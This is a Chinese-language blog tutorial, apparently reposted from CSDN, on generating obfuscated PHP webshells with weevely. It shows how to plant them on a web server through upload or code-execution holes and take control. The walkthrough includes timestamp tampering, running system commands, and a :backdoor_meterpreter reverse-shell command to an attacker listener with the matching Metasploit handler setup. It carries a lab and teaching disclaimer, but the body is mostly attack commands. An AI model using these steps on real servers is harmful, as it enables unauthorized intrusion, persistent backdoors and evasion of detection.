weevely生成木马并反向shell连接msf

其他 2020-07-27 11:41:46 阅读次数: 0

作者:小刚
一位苦于信息安全的萌新小白帽,记得关注给个赞,谢谢
本实验仅用于信息防御教学,切勿用于其它用途

weevely

今天使用一下kali系统下的中国菜刀weevely,生成木马文件、混淆木马文件控制Web服务器,并进一步反弹shell给metasploit做进一步控制。

实验环境

VM搭建的虚拟测试环境
1.phpstudy搭建主机 192.168.1.1
2.kali 192.168.1.128

weevely介绍

weevely是一款使用python编写的webshell工具,很多说是linux下的中国菜刀,但只能用于PHP,weevely在linux上使用非常给力,但是在windows上很多模块无法使用
在这里插入图片描述
weevely使用

生成shell wevely generate <password> <文件名>
连接shell weevely <URL> <password>[cmd]
生成混淆shell weevely generate -obfuscator <模板> <password><文件名>

使用流程

1,使用weevely生成php木马文件

weevely generate XG ~/shell.php

在这里插入图片描述
这里看到,生成一个大小779byte大小的PHP木马文件,密码是XG,文件名shell.php
上面生成的是普通木马文件,下面生成的是基于weevely模板生成的混淆木马,起到一定的防查杀作用 (实际作用不大,照样能被腾讯、360全家桶扫出来。)
在这里插入图片描述
weevely generate -h查看参数,其中 -obfuscator是用来使用混淆模板的,有两个自带模板,我们使用第二个生成木马文件shell2.php

weevely generate -obfuscator cleartext1_php XG shell2.php

在这里插入图片描述

2,将木马文件上传到被攻击web服务器

这里的上传过程看你要攻击的站点了,有文件上传漏洞,代码执行等等,反正能把木马文件上传到web目录下就行。并要知道木马所在的文件目录。
由于是我自己搭建的web,就直接拖拽进去了。
开启phpstudy。
在这里插入图片描述
找到shell.php所在的目录
在这里插入图片描述
打来shell.php发现是空白文件,这是正常现象。能打开,说明shell.php文件能正常执行.
然后复制url链接
在这里插入图片描述

3,使用weevely连接木马文件

weevely http://192.168.1.1/shell/shell.php XG

在这里插入图片描述
查看ip地址,已经连接到主机192.168.1.1
在这里插入图片描述
同样的方式,连接生成的混淆shell2.php
在这里插入图片描述

4,控制参数

连接上shell就相当于控制服务器了,可以在weevely状态下发?来查看可以使用的命令,这里列出ji哥常用命令。

信息搜集:
:system_info收集系统信息
:system_info -info client_ip whoami hostname查找自己连接的ip
文件管理
:file_touch 修改文件时间
:file_touch -human-ts '2018-09-15 200:41:20' 文件名
命令执行
:shell_php 执行PHP命令
:shell_php system('dir');

5,反向shell连接msf

连接上的weevely功能虽然很强大了,但是不要忘了更强的神器metasploit,我们可以使用weevely转发到msf进而最深度的控制服务器。
在这使用:backdoor_meterpreter参数

weevely>:backdoor_meterpreter -payload php/meterpreter/reverse_tcp -lhost 192.168.1.128 -port 4444

在这里插入图片描述

:backdoor_meterpreter 反向shell
-payload php/meterpreter/reverse_tcp 是搭载的攻击载荷
-lhost 转发给监听的ip地址
-port 就是监听端口了

转发完成,接下来就是打开msf使用监听模块监听,获取控制权

use exploit/multi/handler
show payloads
set payload php/meterpreter/reverse_tcp
set Lhost 192.168.1.128

在这里插入图片描述
最后run一下就可以监听到,并进一步控制web服务器了。

总结

weevely用起来也算是菜刀的一种变形,但是搭配起msf可以说是无敌的存在。
weevely在Linux下使用很友好,但在windows下还是使用菜刀,蚁剑和冰蝎吧。
msf控制后的使用命令特别特别多,功能特别强大,说以说msf是渗透神器嘛。(提醒一下,真正进行渗透时的ip地址,要么两个主机在同一个内网网段,要么在同一个公网,不然连接不上。)

猜你喜欢

转载自blog.csdn.net/weixin_43221560/article/details/106093611
今日推荐
火速冲上 GitHub 热榜 —— 开源编程语言、框架哪有这么可爱?
北京人形机器人创新中心发布全球首个纯电驱拟人奔跑的全尺寸人形机器人“天工”
LFOSSA 源来如此公开课 | 掌握云原生未来:CNCF 认证全面攻略与备考秘籍
国产云输入法——仅华为无云端数据上传安全问题
开源日报 | 工业开源项目OGG 1.0;姐姐,你要和我一起配置火狐吗;苹果AI遥遥落后?Fedora 40
开放签电子签章:停止新增,优化体验,前进更进(五一假期前工作)
开源日报 | 中学生开源前端动画引擎;全球首个Llama3 8B中文版开源模型;联想电脑恐出局;Linus讽刺AI炒作
周排行
浏览器对同一域名进行请求的最大并发连接数
React Hook之自定义Hook
【转】MyBatis缓存机制
-Java-泛型
自动化测试常用脚本-发送邮件
LeetCode#859: Buddy Strings
java、Python处理字符串
第二篇の博客
Hadoop伪分布式环境安装
SQL Server进阶(十一)临时表、表变量
每日归档
更多
2024-04-27(56)
2024-04-26(39)
2024-04-25(22)
2024-04-24(36)
2024-04-23(26)
2024-04-22(39)
2024-04-21(0)
2024-04-20(6)
2024-04-19(5)
2024-04-18(0)

代码天地 © 2018 codetd.com

境外服务器   最新电视剧2022